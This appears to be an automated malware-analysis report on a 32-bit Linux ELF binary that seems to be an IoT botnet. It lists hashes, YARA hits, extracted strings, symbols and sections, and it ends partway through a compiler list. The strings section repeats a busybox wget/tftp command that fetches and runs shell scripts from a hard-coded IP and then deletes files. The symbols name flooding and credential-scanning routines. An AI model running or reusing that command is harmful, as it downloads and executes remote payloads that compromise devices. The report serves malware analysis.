Report #3390

Binary
ABI
ELFOSABI_SYSV
Size
156.05KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
9424e71e89434982f44698d94d527418
sha1
858d95250bf1252af5045cebd35f0e9a0e947078
crc32
0x44d54893
sha224
bd7faacd3b0eadfe7a3fecb3973d46e7c6787c602c5502eb5dc3d715
sha256
0153c04c2a6e96149211f206ca0b96d9b9a6c17224992f349b3d6f13bb7406e2
sha384
8a9c54fc921b2351ec394eae1d64e86b153340b5b87f4dd546f7857ae9985c8cfef016042e795936a53c66392722b96c
sha512
3d39172e115722ae4a27d21c05e4bf870db2f14a8c8ac49658154a35da6b1b780805a1f7623fabbc739f494fb8a5dc2c9f757fa202a118280d1906d9f67f5388
ssdeep
3072:rwWXWxVPKJVjvWW6odLqIZtxjnN6yy1PglYWBH3mvcL48/PYalXTuHdTH:kmmVPKJVjvWWjZjnvy1oqKmvcL48/PYt
Community
Google
True
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
69.30.225.250:145, cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
URLs
cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
Mails

Suspicious
True
Strings
List
cd /tmp || cd /var/run; busybox wget http://69.30.225.250/bash.sh; sh bash.sh; busybox tftp 69.30.225.250 -c get t.sh; sh t.sh; busybox tftp -r t2.sh -g 69.30.225.250;sh t2.sh;rm t2.sh;rm -f *
69.30.225.250:145
__rpc_thread_destroy
__pthread_mutex_destroy
__new_sem_destroy
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
__pthread_mutexattr_destroy
pthread_attr_destroy
pthread_mutexattr_destroy
None Killed.
sem_destroy
clntudp_destroy
RPC: Unknown host
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
been_there_done_that.3001
__pthread_mutexattr_setpshared
pthread_mutexattr_setpshared
been_there_done_that
_fwrite.c
open.c
join.c
xdr_des_block
write.c
pread_write.c
pthread_mutex_destroy
(unknown authentication error - %d)
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files
Too many open files in system
pass
Connection reset by peer
No such device
Link has been severed
Is a named type file
Object is remote
Too many links
RPC: Server can't decode arguments
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
; errno = %s
My IP: %s
Invalid flag "%s"
bad auth_len gid %d str %d auth %d
dnslookup.c
Too many users
__GI_execl
__pthread_threads_debug
__GI_pthread_attr_destroy
__dns_lookup
__pthread_manager_event
__pthread_manager_thread
__pthread_manager_reader
__GI_fflush_unlocked
__pthread_manager_request
__GI_pthread_condattr_destroy
PONG!
__GI_xprt_unregister
__pthread_manager
/etc/config/hosts
__pthread_manager_thread_tos
__pthread_manager_thread_bos
__pthread_kill_other_threads_np
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
pthread_condattr_destroy
pthread_cond_destroy
__GI__authenticate
authnone_destroy
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
pthread_kill_all_threads
_Jv_RegisterClasses
manager.c
xdrmem_destroy
__deregister_frame_info_bases
pthread_kill
gethostbyname_r
xprt_unregister
opennameservers.c
daemon.c
__GI_xprt_register
fflush_unlocked.c
__GI_nanosleep

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, trigger, c, Q, i.4252, printchar, prints, printi, print, fdopen_pids, hextable, ipState, errno.c, thread_self, manager.c, terminated_children, main_thread_exiting, pthread_kill_all_threads, pthread_start_thread, pthread_start_thread_event, pthread_free, restart, pthread_reap_children, pthread_threads_counter, ptfork.c, pthread_insert_list, pthread_call_handlers, pthread_atfork_lock, pthread_atfork_prepare, pthread_atfork_child, pthread_atfork_parent, semaphore.c, enqueue, remove_from_queue, __pthread_set_own_extricate_if, thread_self, new_sem_extricate_func, suspend, signals.c, pthread_null_sighandler, thread_self, pthread_sighandler_rt, sighandler, pthread_sighandler, spinlock.c, wait_node_dequeue, __pthread_acquire, wait_node_free, wait_node_free_list_spinlock, wait_node_free_list, restart, thread_self, suspend, wrapsyscall.c, pthread.c, current_rtmin, current_rtmax, pthread_handle_sigdebug, current_level, suspend, thread_self, pthread_onexit_process, pthread_initialize, pthread_handle_sigrestart, pthread_handle_sigcancel, __libc_multiple_threads_ptr, attr.c, cancel.c, thread_self, condvar.c, enqueue, remove_from_queue, __pthread_set_own_extricate_if, restart, thread_self, cond_extricate_func, suspend, events.c, join.c, __pthread_set_own_extricate_if, thread_self, join_extricate_func, suspend, lockfile.c, mutex.c, __pthread_trylock, __pthread_alt_trylock, once_masterlock, once_finished, fork_generation, thread_self, pthread_once_cancelhandler, ptlongjmp.c, pthread_cleanup_upto, specific.c, thread_self, pthread_keys, pthread_keys_mutex, sigaction.c, __restore_rt, __restore, libc/sysdeps/linux/i386/clone.S, 
__error, libc/sysdeps/linux/i386/setjmp.S, libc/sysdeps/linux/i386/mmap.S, __syscall_fcntl.c, __syscall_fcntl64.c, __syscall_rt_sigaction.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, fsync.c, getdtablesize.c, geteuid.c, getpagesize.c, getpid.c, getppid.c, getrlimit.c, gettimeofday.c, kill.c, llseek.c, longjmp.c, lseek.c, msync.c, munmap.c, nanosleep.c, open.c, open64.c, pause.c, pipe.c, poll.c, pread_write.c, __fake_pread_write64, __fake_pread_write, read.c, sched_get_priority_max.c, sched_get_priority_min.c, sched_getparam.c, sched_getscheduler.c, sched_setscheduler.c, sched_yield.c, select.c, setrlimit.c, setsid.c, sigprocmask.c, sigsuspend.c, time.c, wait.c, wait4.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, errno.c, puts.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strstr.c, strtok.c, next_start.1278, isatty.c, tcdrain.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, accept.c, connect.c, getsockopt.c, recv.c, recvfrom.c, recvmsg.c, send.c, sendmsg.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigdelset.c, sigempty.c, sigfillset.c, sigismem.c, sigjmp.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, calloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, on_exit.c, daemon.c, execl.c, sleep.c, sysconf.c, libc_pthread_init.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, rpc_thread.c, rpc_thread_multi, __libc_tsd_RPC_VARS_mem, once.5915, __syscall_error.c, libc/sysdeps/linux/i386/__longjmp.S, libc/sysdeps/linux/i386/vfork.S, __socketcall.c, clock_getres.c, execve.c, getegid.c, getgid.c, getuid.c, ioctl.c, sbrk.c, _WRITE.c, _fwrite.c, 
_trans2w.c, _uintmaxtostr.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, clnt_simple.c, clnt_udp.c, clntudp_geterr, clntudp_freeres, clntudp_abort, clntudp_control, udp_ops, clntudp_destroy, clntudp_call, create_xid.c, mylock, is_initialized, __rpc_lrand48_data, pm_getport.c, timeout, tottimeout, pmap_prot.c, rpc_commondata.c, rpc_prot.c, reply_dscrm, svc.c, svc_find, svc_auth.c, svcauthsw, _svcauth_null, svc_authux.c, xdr.c, crud.3487, xdr_zero, xdr_mem.c, xdrmem_ops, xdrmem_destroy, xdrmem_getpos, xdrmem_setpos, xdrmem_inline, xdrmem_putint32, xdrmem_getint32, xdrmem_putlong, xdrmem_getlong, xdrmem_putbytes, xdrmem_getbytes, inet_aton.c, gethostbyname_r.c, realloc.c, lrand48_r.c, nrand48_r.c, srand48_r.c, __exit_handler.c, dl-support.c, brk.c, cmsg_nxthdr.c, mremap.c, fseeko.c, printf.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs.c, memmove.c, strcmp.c, strnlen.c, memcmp.c, memcmp_bytes, rawmemchr.c, strspn.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, ffs.c, auth_none.c, authnone_verf, authnone_validate, authnone_refresh, authnone_destroy, authnone_marshal, ops, authunix_prot.c, bindresvport.c, port.2516, pmap_clnt.c, __get_myaddress, timeout, tottimeout, rpc_dtablesize.c, size.4051, xdr_array.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, bind.c, drand48-iter.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fclose.c, fopen.c, perror.c, fprintf.c, _fopen.c, _load_inttype.c, _store_inttype.c, _fpmaxtostr.c, fmt, exp10_table, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strncat.c, strdup.c, clnt_perror.c, rpc_errlist, rpc_errstr, free_mem, _buf, auth_errlist, 
auth_errstr, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, tolower.c, __C_ctype_tolower.c, sprintf.c, vsnprintf.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, longjmp, __libc_tcdrain, __linuxthreads_pthread_threads_max, __GI_pthread_attr_getdetachstate, __GI_execve, __libc_sigaction, __libc_pread, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, xdr_longlong_t, bcmp, __GI_memchr, __GI_pthread_attr_setdetachstate, __GI___glibc_strerror_r, pthread_mutex_timedlock, waitpid, __longjmp, __libc_fsync, __open_nameservers, __GI_fopen, xprt_register, getrlimit, ioctl, pause, pthread_cond_signal, _stdio_openlist_use_count, __pthread_mutexattr_destroy, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_xdrmem_create, __GI_time, getgid, __pthread_exit_code, printf, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, lrand48_r, getdtablesize, __GI_h_errno, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __pthread_restart_new, __GI_tolower, pthread_mutexattr_gettype, putc_unlocked, pthread_attr_destroy, recv, connect, __linuxthreads_initial_report_events, __encode_question, svcerr_auth, __GI___uClibc_fini, numpids, __encode_header, pthread_attr_getstacksize, __GI_strncat, __pthread_once, pthread_create, sigemptyset, __pthread_mutex_lock, pthread_getspecific, __new_sem_destroy, initConnection, __sigdelset, __GI_clock_getres, __GI_pthread_attr_init, __GI_svc_register, __pthread_find_self, __uClibc_fini, memrchr, geteuid, __rpc_thread_svc_cleanup, inet_pton, __GI_vsnprintf, pthread_attr_init, __GI_pthread_setcanceltype, __GI_setsid, pthread_mutexattr_getkind_np, __GI_sigsuspend, memmove, sendTCP, pthread_exit, __bsd_signal, 
sem_timedwait, __GI_strpbrk, pmap_set, __stdio_trans2r_o, __GI_setsockopt, munmap, __libc_stack_end, __pthread_manager_thread_bos, sched_getparam, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, _longjmp, __exit_function_table, __GI_xdr_pmap, pthread_condattr_setpshared, xdrmem_create, __libc_fcntl, atol, _h_errno, xdr_des_block, __new_sem_init, getRandomPublicIP, xdr_opaque_auth, getc_unlocked, clnt_spcreateerror, __ctype_b, __pthread_manager_event, __GI_random_r, __fresetlockfiles, usernames, clnt_perrno, pwrite64, __GI___longjmp, __pthread_mutexattr_settype, errno, getegid, __GI_pthread_attr_getschedparam, __linuxthreads_create_event, __GI_clnt_sperror, __GI_sbrk, zprintf, __libc_accept, __GI___uClibc_init, _create_xid, __exit_handler, execve, __libc_current_sigrtmax, __GI_pthread_condattr_destroy, __libc_pwrite64, pthread_condattr_init, getpagesize, getpid, pthread_attr_getstackaddr, xdr_u_hyper, __pthread_suspend, setstate_r, __GI_lseek64, fgets, getHost, __libc_getpid, wildString, pthread_key_delete, __GI_pthread_attr_setschedparam, __xpg_strerror_r, __GI___rpc_thread_svc_fdset, _pthread_cleanup_pop, fcntl64, __pthread_lock, memcpy, __GI_svc_getreq, pthread_cancel, makeRandomStr, pmap_getport, getRandomIP, __GI_fputs_unlocked, execl, __pthread_mutexattr_setpshared, __GI_fgets, __pthread_initial_thread_bos, svc_sendreply, perror, pthread_mutexattr_destroy, _rpc_dtablesize, __pthread_reset_main_thread, creat, _stdio_openlist_dec_use, sclose, __libc_select, __pthread_do_exit, pthread_equal, _ppfs_init, __GI_memcmp, puts, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, __libc_current_sigrtmin, __pthread_sig_debug, sem_destroy, __GI__seterr_reply, tolower, getuid, __GI_xdr_string, system, __open_etc_hosts, __rpc_thread_svc_max_pollfd, __GI_xprt_register, __pthread_cleanup_push_defer, malloc, isatty, __GI_pthread_cond_timedwait, siglongjmp, pthread_attr_getscope, __GI_pmap_unset, sleep, 
__GI_atol, sched_setscheduler, __new_sem_post, __pthread_initialize_manager, vsnprintf, __dns_lookup, __GI_read, recvfrom, sem_wait, xdr_bytes, svcerr_decode, tcdrain, __C_ctype_tolower, pthread_attr_getguardsize, random_r, __libc_longjmp, __dso_handle, sem_post, sched_getscheduler, __new_exitfn, clock_getres, pthread_testcancel, __pthread_manager_sighandler, __libc_pthread_init, gethostbyname_r, __pthread_attr_getstackaddr, tcpcsum, __linuxthreads_death_event, __linuxthreads_version, fdpclose, __GI_pthread_attr_destroy, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, __GI_accept, clnt_perror, __pthread_attr_setstacksize, isspace, pthread_attr_getinheritsched, __stdio_seek, __linuxthreads_pthread_keys_max, pthread_kill_other_threads_np, mempcpy, __GI_strcoll, __GI_write, __pthread_mutexattr_gettype, xdr_void, sem_unlink, __ctype_toupper, __libc_pwrite, __libc_read, xdr_pmap, svcerr_progvers, __GI_xdr_accepted_reply, _string_syserrmsgs, svcerr_noproc, __pthread_kill_other_threads_np, __GI_open, __GI_strchr, __searchdomain, __pthread_initialize, __GI_xdr_rejected_reply, __pthread_mutexattr_setkind_np, lseek, __GI_clnt_perror, sigaddset, __linuxthreads_pthread_key_2ndlevel_size, __GI_tcgetattr, __environ, mmap, xdr_vector, __GI_clntudp_create, __pthread_alt_unlock, svc_getreq_common, wcsnrtombs, pthread_detach, makeIPPacket, sockprintf, __GI_inet_ntoa, send, svc_getreq, __fgetc_unlocked, __GI_clnt_spcreateerror, abort, nrand48_r, xprt_unregister, pthread_attr_getschedpolicy, __sigjmp_save, __libc_drand48_data, __pthread_handles, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __libc_tsd_RPC_VARS_data, __GI_getgid, srandom_r, __GI_fputs, xdr_char, _init, __GI_setrlimit, clnt_pcreateerror, __GI_inet_ntoa_r, __GI_setstate_r, pthread_attr_setstackaddr, parseHex, strtol, __sigsetjmp, pipe, __libc_lseek64, __GI_pthread_getschedparam, _svcauth_unix, strnlen, rawmemchr, __GI_mempcpy, accept, __libc_allocate_rtsig, 
__malloc_state, pthread_getschedparam, __GI___C_ctype_b_data, __libc_pread64, __GI_xdr_replymsg, __GI_lrand48_r, __sigaddset, __GI_xdr_authunix_parms, pthread_setcancelstate, xdr_union, __pthread_functions, nanosleep, __GI_send, __pthread_wait_for_restart_signal, xdr_enum, h_errno, calloc, __GI_svcerr_auth, xdr_bool, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, setrlimit, csum, __GI_xdr_long, __exit_cleanup, xdr_wrapstring, xdr_rejected_reply, __GI___rpc_thread_createerr, __GI_execl, __GI_srandom_r, pthread_condattr_destroy, __GI___ctype_tolower, pthread_attr_setscope, write, __rpc_thread_variables, environ, __GI_close, xdr_free, xdr_netobj, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __pthread_destroy_specifics, ffs, svc_register, xdr_long, pthread_mutexattr_setkind_np, __GI_svcerr_decode, __GI_brk, bind, _svcauth_short, __GI_nanosleep, __GI_strtok, svcerr_systemerr, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, __pthread_nonstandard_stacks, __GI_clntudp_bufcreate, __GI___libc_open64, pthread_cond_broadcast, pthread_once, __pthread_once_fork_child, ourIP, chdir, pthread_attr_setinheritsched, __pthread_alt_lock, pmap_unset, __pthread_manager_adjust_prio, fseeko, _stdio_openlist_del_count, connectTimeout, __pthread_manager_thread, __pthread_setconcurrency, setsockopt, xdr_short, bsd_signal, fseek, mremap, pthread_setschedparam, __GI_kill, __GI_strcmp, svc_getreqset, __GI_memmove, setstate, __decode_dotted, __GI_pthread_cond_broadcast, __pthread_perform_cleanup, __stdio_READ, pthread_key_create, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, svc_getreq_poll, __stdin, stdin, __GI_clnt_sperrno, __new_sem_wait, wait, xdr_accepted_reply, __GI_isatty, __libc_open64, pthread_setconcurrency, sem_init, svcerr_weakauth, xdr_authunix_parms, __pthread_mutex_destroy, __pthread_mutexattr_getkind_np, __pthread_handles_num, _start, sem_close, __deregister_frame_info_bases, 
__GI_xdr_opaque_auth, strstr, __GI_ioctl, xdr_u_longlong_t, init_rand, rand, pthread_kill, signal, read, __GI_xdr_int, __pthread_manager_request, __pthread_internal_tsd_get, __decode_header, pread64, __linuxthreads_pthread_sizeof_descr, pthread_attr_setstacksize, getCores, __GI___h_errno_location, xdr_u_char, __GI_memcpy, sendmsg, strcoll, clntudp_create, __GI_xdr_callhdr, wcsrtombs, _stdio_user_locking, __pthread_internal_tsd_address, __cmsg_nxthdr, __GI_svcerr_noprog, __GI_sigdelset, strncpy, strcasecmp, htonl, sendto, __exit_count, xdr_u_long, __C_ctype_toupper, __GI_open64, StartTheLelz, sched_get_priority_max, __GI___C_ctype_b, xdr_replymsg, pthread_sigmask, realloc, on_exit, __libc_siglongjmp, __GI_gethostbyname_r, __GI_pthread_cond_signal, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __pthread_attr_setstackaddr, __GI___C_ctype_tolower, __GI_recvfrom, pthread_cond_init, __GI_getrlimit, __GI_strcpy, __GI_inet_ntop, strtok, __GI___fputc_unlocked, sigfillset, memcmp, svcerr_noprog, sched_get_priority_min, __stdio_adjust_position, xdr_opaque, malloc_trim, _vfprintf_internal, __GI_poll, __GI_nrand48_r, fork, __pthread_restart, __GI_pthread_attr_setschedpolicy, pthread_mutexattr_getpshared, __GI_pthread_attr_setinheritsched, __stdio_rfill, strncat, __GI_pthread_attr_getscope, __GI_bindresvport, gotIP, __libc_pause, sem_trywait, __GI_sleep, sigaction, _dl_phdr, __pthread_mutexattr_init, __GI_svc_sendreply, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, xdr_callhdr, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_svcerr_progvers, __GI_fork, strdup, __libc_close, __pthread_internal_tsd_set, __GI_getpid, inet_aton, pthread_condattr_getpshared, index, _pthread_cleanup_push_defer, processCmd, __sigismember, gettimeofday, fopen, __bss_start, __GI_pthread_self, __libc_open, memset, 
__GI_socket, main, __GI___libc_lseek, __glibc_strerror_r, __GI_sigfillset, __rpc_thread_clnt_cleanup, listFork, __GI___C_ctype_tolower_data, __GI_xdr_union, __stdio_fwrite, negotiate, srand, __rpc_thread_svc_pollfd, initstate, fclose, __GI_pthread_attr_setscope, __syscall_rt_sigaction, open64, xdr_string, ntohs, pthread_mutexattr_settype, inet_ntoa, sendUDP, getppid, tcgetattr, __C_ctype_tolower_data, __libc_recvfrom, time, __pthread_threads_events, __libc_system, __GI_abort, pthread_mutexattr_setpshared, poll, __GI_pthread_cond_wait, __GI_pthread_cond_init, __GI_pthread_cond_destroy, __GI_xdr_u_short, xdr_u_int, fdpopen, __GI_fprintf, pthread_attr_getdetachstate, __pthread_last_event, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, __libc_recvmsg, strcmp, pthread_mutex_unlock, callrpc, __nameserver, data_start, _seterr_reply, __rpc_thread_svc_fdset, __GI_sysconf, __pthread_manager_reader, __pthread_initial_thread, __h_errno_location, __GI_putc_unlocked, __GI___rpc_thread_svc_pollfd, matchPrompt, __C_ctype_b_data, __GI_inet_pton, _stdio_fopen, __GI_xdr_u_hyper, __GI_pthread_setschedparam, _fini, __GI_xdr_opaque, __GI_chdir, authnone_create, __vfork, __GI_mmap, __GI_xdr_array, sprintf, __pthread_offsetof_descr, __new_sem_trywait, fdgets, msync, __get_pc_thunk_bx, strerror_r, __GI_ffs, __GI_select, __libc_waitpid, __pthread_unlock, __libc_multiple_threads, sem_open, __GI_xdr_bool, __rpc_thread_destroy, __GI_waitpid, __GI_xdr_u_int, __GI_vfprintf, __GI_xdr_enum, _stdio_term, __decode_answer, __GI_signal, __pthread_attr_setguardsize, stderr, __pthread_exit_requested, commServer, __pthread_attr_getguardsize, __pthread_manager_thread_tos, __GI_pthread_exit, vfork, __C_ctype_b, __pthread_once_fork_parent, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, sigismember, __atexit_lock, scanPid, __linuxthreads_reap_event, fsync, rand_cmwc, __pthread_manager, __libc_lseek, __GI_xprt_unregister, clnt_sperror, __GI_pmap_set, 
__pthread_getconcurrency, __pthread_alt_timedlock, __libc_fcntl64, _pthread_cleanup_push, pread, pthread_self, pthread_setcanceltype, getsockopt, __GI_fseeko64, __pthread_once_fork_prepare, pthread_mutexattr_init, __libc_wait, fflush_unlocked, __stdio_wcommit, __exit_slots, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, __GI_recvmsg, __GI_pthread_attr_getschedpolicy, __drand48_iterate, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_xdr_u_long, __GI_strstr, __searchdomains, _end, bindresvport, __pthread_threads_max, htons, pthread_mutex_destroy, svc_fdset, __rpc_thread_createerr, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, pthread_mutex_lock, __GI_svc_getreq_common, __new_sem_getvalue, __GI_connect, __curbrk, sem_getvalue, __libc_poll, pthread_cond_wait, _dl_phnum, __GI_pthread_equal, _fpmaxtostr, svc_unregister, __errno_location, __pthread_timedsuspend, uppercase, __GI_pmap_getport, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, pthread_attr_setguardsize, __GI_geteuid, __GI_sendmsg, sigdelset, inet_ntop, brk, pthread_mutex_trylock, __GI_pthread_setcancelstate, _null_auth, pthread_atfork, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, __GI_perror, __libc_sendmsg, _errno, _authenticate, __GI_gettimeofday, atoi, _stdio_openlist_del_lock, pthread_cond_destroy, __GI_inet_aton, pthread_attr_setschedpolicy, __GI_svc_getreq_poll, fgets_unlocked, __pthread_mutexattr_getpshared, __GI_bind, _exit, szprintf, __pthread_timedsuspend_new, __pthread_sig_cancel, __GI_xdr_void, __GI_lseek, __pthread_sig_restart, strspn, __pthread_offsetof_pid, __libc_recv, __pthread_main_thread, daemon, pthread_mutex_init, __pthread_cleanup_pop_restore, __libc_creat, __pthread_attr_getstacksize, strlen, __GI___cmsg_nxthdr, lseek64, open, clone, xdr_array, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, 
__GI_errno, __fork, __libc_sendto, __stdio_trans2w_o, __GI_vfork, __GI__authenticate, strchr, __GI_rawmemchr, __GI_srand48_r, fputs, svc_max_pollfd, __GI_raise, pthread_attr_setschedparam, __data_start, __pthread_sizeof_handle, __pthread_provide_wrappers, setsid, __GI_inet_addr, __GI_svc_unregister, __GI_pthread_condattr_init, rpc_createerr, __libc_msync, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __pthread_threads_debug, pthread_attr_setdetachstate, recvmsg, fputc_unlocked, svc_pollfd, readUntil, __libc_sigsuspend, __GI_xdr_hyper, fcntl, __GI_xdr_bytes, sched_yield, pthread_join, __GI__rpc_dtablesize, pthread_getconcurrency, __GI_atoi, fseeko64, pthread_cond_timedwait, __GI_sprintf, clntudp_bufcreate, __ctype_tolower, __GI_svc_getreqset, __GI_pthread_attr_getinheritsched, sigwait, wcrtomb, __GI___rpc_thread_svc_max_pollfd, pwrite, close, __libc_connect, passwords, pthread_attr_getschedparam, srand48_r, __GI_strlen, sendHOLD, mainCommSock, pids, vfprintf, strpbrk, pthread_setspecific, xdr_int, xdr_hyper, getBogos, sigsuspend, _load_inttype, raise, clnt_sperrno, free, xdr_u_short, sigprocmask, __fputc_unlocked, __GI_authnone_create, __GI_xdr_short
Number
1360
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: 